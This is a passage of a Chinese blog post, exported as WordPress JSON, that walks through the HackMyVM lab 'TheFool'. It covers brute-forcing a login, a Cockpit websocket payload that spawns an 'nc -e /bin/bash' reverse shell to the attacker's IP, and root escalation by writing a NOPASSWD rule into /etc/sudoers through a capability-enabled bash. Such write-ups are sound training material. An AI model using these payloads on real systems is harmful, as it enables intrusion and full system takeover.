alt=\"image-20240706151957033\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u5c1d\u8bd5\u8fdb\u884c\u7206\u7834\uff0c\u6ca1\u7206\u7834\u51fa\u6765\uff0c\u770b\u4e00\u4e0b\u8bf7\u6c42\u5934\uff0c\u53d1\u73b0\u88ab\u52a0\u5bc6\u4e86\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407061609624.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407061609624.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240706152449039\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>\u628a\u4e0b\u9762\u8fd9\u4e2a\u52a0\u5bc6\u53d6\u6d88\u6389\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407061609625.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407061609625.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240706152545376\" style=\"zoom: 33%;\" \/><\/div><\/p>\n<p>\u9759\u7b49\u7206\u7834\u51fa\u6765\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407061609626.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407061609626.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240706153059943\" style=\"zoom: 33%;\" \/><\/div><\/p>\n<pre><code class=\"language-text\">bWluZXJ2YTp0d2VldHk=\nminerva:tweety<\/code><\/pre>\n<h3>\u5957\u63a5\u5b57\u4f20\u9012\u7cfb\u7edf\u547d\u4ee4<\/h3>\n<p>\u767b\u5f55\u8fdb\u53bb\uff0c\u53d1\u73b0\u542f\u7528\u4e86\u5957\u63a5\u5b57\u670d\u52a1\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407061609627.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407061609627.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240706153807497\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u5c1d\u8bd5\u8fdb\u884c\u6293\u5305\u5229\u7528\uff0c\u62e6\u622a\u4ee5\u540e\u70b9\u51fb\u89e6\u53d1\u5668\u8fdb\u884c\u6293\u5305\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407061609628.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407061609628.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240706154125806\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407061609629.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407061609629.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240706154239363\" style=\"zoom: 50%;\" \/><\/div><\/p>\n<p>\u5c1d\u8bd5\u6267\u884c\u7cfb\u7edf\u547d\u4ee4\uff0c\u4f46\u662f\u6ca1\u52a8\u9759\uff0c\u6362\u4e00\u4e2a\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407061609630.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407061609630.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240706154808806\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u53d1\u73b0\u7591\u4f3c\u6267\u884c\u7cfb\u7edf\u547d\u4ee4\u7684\u5730\u65b9\uff0c\u5c1d\u8bd5\u8fdb\u884c\u8fde\u63a5\u53cd\u5f39\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407061609631.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407061609631.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240706155002456\" style=\"zoom:50%;\" \/><\/div><\/p>\n<pre><code class=\"language-bash\">{&quot;payload&quot;:&quot;stream&quot;,&quot;spawn&quot;:[&quot;nc&quot;,&quot;-e&quot;,&quot;\/bin\/bash&quot;,&quot;192.168.0.143&quot;,&quot;1234&quot;],&quot;command&quot;:&quot;open&quot;,&quot;channel&quot;:&quot;2:3!7&quot;,&quot;host&quot;:&quot;localhost&quot;,&quot;flow-control&quot;:true,&quot;group&quot;:&quot;cockpit1:localhost\/system\/services&quot;}<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407061609632.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407061609632.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240706155033210\" style=\"zoom: 50%;\" \/><\/div><\/p>\n<p>\u5f39\u8fc7\u6765\u4e86\uff0c\u5c1d\u8bd5\u8fdb\u884c\u63d0\u6743\uff1a<\/p>\n<h2>\u63d0\u6743<\/h2>\n<h3>\u4fe1\u606f\u641c\u96c6<\/h3>\n<pre><code class=\"language-bash\">(remote) minerva@thefool:\/run\/user\/1000$ cd ~\n(remote) minerva@thefool:\/home\/minerva$ ls -la\ntotal 32\ndrwxr-xr-x 3 minerva minerva 4096 Oct 22  2021 .\ndrwxr-xr-x 4 root    root    4096 Oct 22  2021 ..\n-rw-r--r-- 1 minerva minerva  220 Oct 22  2021 .bash_logout\n-rw-r--r-- 1 minerva minerva 3526 Oct 22  2021 .bashrc\ndrwxr-xr-x 3 minerva minerva 4096 Oct 22  2021 .local\n-rw-r--r-- 1 minerva minerva  807 Oct 22  2021 .profile\n-rw------- 1 minerva minerva   16 Oct 22  2021 user.txt\n-rw------- 1 minerva minerva  106 Oct 22  2021 .Xauthority\n(remote) minerva@thefool:\/home\/minerva$ cat user.txt \nGUY6dsaiuyUIYHz\n(remote) minerva@thefool:\/home\/minerva$ sudo -l\n[sudo] password for minerva: \nsudo: a password is required\n(remote) minerva@thefool:\/home\/minerva$ find \/ -perm -u=s -type f 2&gt;\/dev\/null\n\/usr\/libexec\/polkit-agent-helper-1\n\/usr\/sbin\/exim4\n\/usr\/sbin\/pppd\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/lib\/cockpit\/cockpit-session\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/bin\/chsh\n\/usr\/bin\/su\n\/usr\/bin\/fusermount\n\/usr\/bin\/mount\n\/usr\/bin\/pkexec\n\/usr\/bin\/sudo\n\/usr\/bin\/chfn\n\/usr\/bin\/umount\n\/usr\/bin\/gpasswd\n\/usr\/bin\/newgrp\n\/usr\/bin\/ntfs-3g\n\/usr\/bin\/passwd\n(remote) minerva@thefool:\/home\/minerva$ ls -la \/usr\/sbin\/exim4\n-rwsr-xr-x 1 root root 1457924 Jul 13  2021 \/usr\/sbin\/exim4\n(remote) minerva@thefool:\/home\/minerva$ \/usr\/sbin\/exim4\nExim is a Mail Transfer Agent. It is normally called by Mail User Agents,\nnot directly from a shell command line. Options and\/or arguments control\nwhat it does when called. For a list of options, see the Exim documentation.\n(remote) minerva@thefool:\/home\/minerva$ \/usr\/sbin\/getcap -r \/ 2&gt;\/dev\/null\n\/usr\/lib\/i386-linux-gnu\/gstreamer1.0\/gstreamer-1.0\/gst-ptp-helper cap_net_bind_service,cap_net_admin=ep\n\/usr\/bin\/ping cap_net_raw=ep\n\/usr\/bin\/bash cap_dac_override=ep<\/code><\/pre>\n<h3>\u4fee\u6539\u5bc6\u7801<\/h3>\n<p>\u8be5\u6743\u9650\u5141\u8bb8\u6211\u4eec\u5bf9\u6587\u4ef6\u8fdb\u884c\u8986\u5199\u64cd\u4f5c\uff0c\u4f7f\u7528\u5176\u4fee\u6539sudoer\u6743\u9650\u5373\u53ef\uff1a<\/p>\n<pre><code class=\"language-bash\">(remote) minerva@thefool:\/home\/minerva$ bash -c &#039;echo &quot;ALL ALL=(ALL) NOPASSWD: ALL&quot; &gt;&gt; \/etc\/sudoers&#039;\n(remote) minerva@thefool:\/home\/minerva$ sudo -l\nMatching Defaults entries for minerva on thefool:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser minerva may run the following commands on thefool:\n    (ALL) NOPASSWD: ALL<\/code><\/pre>\n<p>\u63a5\u4e0b\u6765\u5c31\u53ef\u4ee5\u4e3a\u6240\u6b32\u4e3a\u4e86\u3002<\/p>\n<pre><code class=\"language-bash\">(remote) minerva@thefool:\/root$ sudo su root\nroot@thefool:~# cd ~\nroot@thefool:~# ls -la\ntotal 28\ndrwx------  3 root root 4096 Oct 22  2021 .\ndrwxr-xr-x 18 root root 4096 Oct 22  2021 ..\n-rw-------  1 root root  170 Oct 22  2021 .bash_history\n-rw-r--r--  1 root root  571 Apr 10  2021 .bashrc\ndrwxr-xr-x  3 root root 4096 Oct 22  2021 .local\n-rw-r--r--  1 root root  161 Jul  9  2019 .profile\n-rw-------  1 root root   16 Oct 22  2021 .root.7x7\nroot@thefool:~# cat .root.7x7 \nBMNB6s67tS67TSG<\/code><\/pre>\n<h2>\u53c2\u8003<\/h2>\n<p><a href=\"https:\/\/www.bilibili.com\/video\/BV1yu4m1u7xo\/\">https:\/\/www.bilibili.com\/video\/BV1yu4m1u7xo\/<\/a><\/p>\n<p><a href=\"https:\/\/nepcodex.com\/2021\/10\/thefool-writeup-hackmyvm-walkthrough\/\">https:\/\/nepcodex.com\/2021\/10\/thefool-writeup-hackmyvm-walkthrough\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>TheFool \u4fe1\u606f\u641c\u96c6 IP=192.168.0.127 \u7aef\u53e3\u626b\u63cf \u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/te [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-718","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/718","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=718"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/718\/revisions"}],"predecessor-version":[{"id":719,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/718\/revisions\/719"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=718"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=718"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=718"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}